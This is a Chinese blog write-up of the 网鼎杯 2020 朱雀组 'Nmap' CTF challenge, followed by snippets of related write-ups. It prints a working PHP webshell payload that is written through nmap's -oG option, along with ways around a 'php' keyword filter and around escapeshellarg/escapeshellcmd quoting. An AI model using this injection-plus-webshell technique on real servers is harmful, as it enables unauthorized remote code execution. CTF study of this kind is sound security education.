[网鼎杯 2020 朱雀组]Nmap 1

最新推荐文章于 2024-04-01 20:44:04 发布
最新推荐文章于 2024-04-01 20:44:04 发布
阅读量2.3k 收藏 8
点赞数 1
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/plant1234/article/details/124202332
版权

[网鼎杯 2020 朱雀组]Nmap 1

首先得到题目打开得到

在这里插入图片描述

说是输入houst和IP进行扫描

测试一波:127.0.0.1

得到:

在这里插入图片描述

本地测一下nmap 命令得到:

在这里插入图片描述
发现效果一样

这里需要知道
nmap 命令将扫描结果保存在文件里面:

例如:将nmap 127.0.0.1的结果保存在test.txt里面

nmap 127.0.0.1 -oN test.txt

在这里插入图片描述

nmap其他写文件命令:

-oN (标准输出)

-oX (XML输出)

-oS (ScRipT KIdd|3 oUTpuT)

-oG (Grep输出)

-oA (输出至所有格式)

这样我们就能写shell

<?= @eval($_POST[1]); ?> -oG a.phtml

回到题目测试得到:

在这里插入图片描述

发现有检查测试一下过滤了写什么

发现过滤了php

就想办法绕过:

<?php ?>这里的php用短标签代替:<?= ?>

文件格式用:phtml代替

所以playload:

<?= @eval($_POST[1]); ?> -oG a.phtml

在这里插入图片描述
发现没有写入文件

应为进行了escapeshellarg()与escapeshellcmd()函数处理保护,没法产生文件

可以进行单引号和空格绕过,
具体看大佬博客:https://paper.seebug.org/164/

得到playload:

' <?= @eval($_POST[1]);?> -oG a.phtml '

写入成功:

在这里插入图片描述
访问得到:

在这里插入图片描述

执行命令获取flag

在这里插入图片描述
参考博客:

https://blog.csdn.net/m0_52199518/article/details/115454428

南冥~
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF Web [网鼎杯 2020 朱雀]Nmap1
网安小趴菜
11-16 666
BUUCTF Web [网鼎杯 2020 朱雀]Nmap wp1
[网鼎杯 2020 朱雀]Nmap(双解详细分析)
记录学习,一起进步
01-29 1055
[网鼎杯 2020 朱雀]Nmap
[网鼎杯 2020 朱雀]Nmap1
最新发布
m0_75178803的博客
04-01 971
打开题目在源代码中看到了提示先随便输入127.0.0.1那我们试试输入可以看到 | 被转义符号\所转义那我们输入 127.0.0.1 /| ls得到三条反斜线我们猜测,我们输入的东西是被escapeshellarg和escapeshellcmd处理过后的结果我们输入的东西必须绕过这两个函数。
web buuctf [网鼎杯 2020 朱雀]Nmap1
weixin_44214568的博客
04-05 1698
考点:namp注入 参考web buuctf [BUUCTF 2018]Online Tool1_半杯雨水敬过客的博客-CSDN博客 1. 2.利用NMAP里的-oG命令实现代码的写入,那我们这里就可以尝试构造payload,来利用‘拼接,写入我们想要的shell文件 我们直接用那道buu里的payload: ' <?php eval($_POST["cmd"]);?> -oG zhuque.php ' 注入之后发现存在过滤,fuzz,过滤了php (1)利用<?=来代替.
[网鼎杯 2020 朱雀]Nmap
qq_43801002的博客
08-02 4489
题目 站老是崩,有点难受。 过程 1.题目非常熟悉,以前在buu写过。主要考察nmap的一些用法。 2. 选项 解释 -oN 标准保存 -oX XML保存 -oG Grep保存 -oA 保存到所有格式 -append-output 补充保存文件 选项-oG 将结果Grep保存。 nmap -F -oG test.txt 192.168.23.1 选项-oA 该选项可将扫描结果以标准格式、XML格式和Grep格式一次性保存,分别放在.nmap,.xml和.gnmap文件中
网鼎杯青龙18道.rar
06-11
【标题】"网鼎杯青龙18道.rar"是一个关于网络安全竞赛的资源压缩包,其中包含了2020网鼎杯青龙的比赛题目。网鼎杯是一项知名的网络安全技术竞赛,旨在提升参赛者的网络安全技能和实战能力,尤其针对青龙,...
用mimiktz和nmap进行网络扫描
06-15
《mimiktz和nmap在网络扫描中的应用》 网络安全是一项至关重要的任务,尤其是在现代数字化社会中。本文将深入探讨如何使用mimiktz和nmap这两种强大的工具来进行网络扫描,以获取目标主机的登录账号信息,并通过不同...
Nmap扫描教程1
08-03
1. **查看版本**:使用`nmap -V`或`nmap --version`可以查看Nmap的当前版本。 2. **Ping扫描**:`nmap -sP`或`nmap -sn`用于确定主机是否在线,不扫描端口。如果不希望先进行ping扫描,可以使用`-Pn`或`-P0`。 3. ...
nmap基础操作1
08-04
nmap基础操作1 nmap是一款功能强大且广泛使用的网络探测和安全 감사工具,能够对目标主机或网络进行扫描,侦测其开放的端口、服务版本、操作系统等信息,并且提供了丰富的选项和参数来控制扫描的行为和结果。 扫描...
[网鼎杯 2020 朱雀]Nmap 1两种解法
weixin_53150482的博客
07-19 410
[网鼎杯 2020 朱雀]Nmap 1两种解法
2020网鼎杯朱雀题目.rar
05-20
含有misc,re,crypto,pwn,webweb题为thinkjava
BUUCTF [网鼎杯 2020 朱雀] Nmap
Senimo
12-09 3579
BUUCTF [网鼎杯 2020 朱雀] Nmap 考点:nmap -oG 写入文件、-iL读取扫描文件 解法:将nmap扫描结果写入文件时加入一句话木马 启动环境: 类似Nmap的功能,一个输入命令行,提示输入ip地址,尝试输入正常内容:127.0.0.1 可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令 127.0.0.1 | ls 可以看到|被\转义,尝试使用;: 提示地址错误,尝试了一些其他的命令执行,也无法实现,参考 ...
2020网鼎杯朱雀WEB——NMAP&PHPWEB
Pdsdt1的博客
05-18 4152
NMAP 考察的是比较老的知识点了,在BUU出现过的题目,nmap命令行参数注入 详细文章: https://blog.csdn.net/qq_26406447/article/details/100711933 访问题目,发现我们可以输入url,经过nmap扫描后会返回出结果,这里引入nmap命令中的一个参数 -oG #可以实现将命令和结果写到文件 源码大概的构造: echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host); 我们可以通过
【学习笔记 48】 buu [网鼎杯 2020 朱雀]Nmap
weixin_43553654的博客
08-11 683
0x00 知识点 NMAP中使用-0G命令可以实现代码写入 0x01 解题思路 打开网站一看发现是一个NMAP网站尝试输入输入任意ip 可以看到这里返回了nmap扫描的结果,这里我们就想到了NMAP里的-oG命令实现代码的写入,那我们这里就可以尝试构造payload,来利用‘拼接,写入我们想要的shell文件 ' <?php @eval($_POST["cmd"]);?> -oG shell.php ' 尝试后发现报错,说明这里有过滤不能直接进行,最后利用fuzz发现过滤了php,
[网鼎杯 2020 朱雀]nmap
03-16
nmap是一款网络扫描工具,可以用来扫描目标主机的开放端口、操作系统类型、服务版本等信息。它可以帮助安全人员评估网络安全状况,发现潜在的漏洞和攻击面。同时,nmap也可以用来管理网络,例如发现新设备、检查网络拓扑等。nmap具有强大的扫描功能和灵活的配置选项,是网络安全工作者必备的工具之一。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值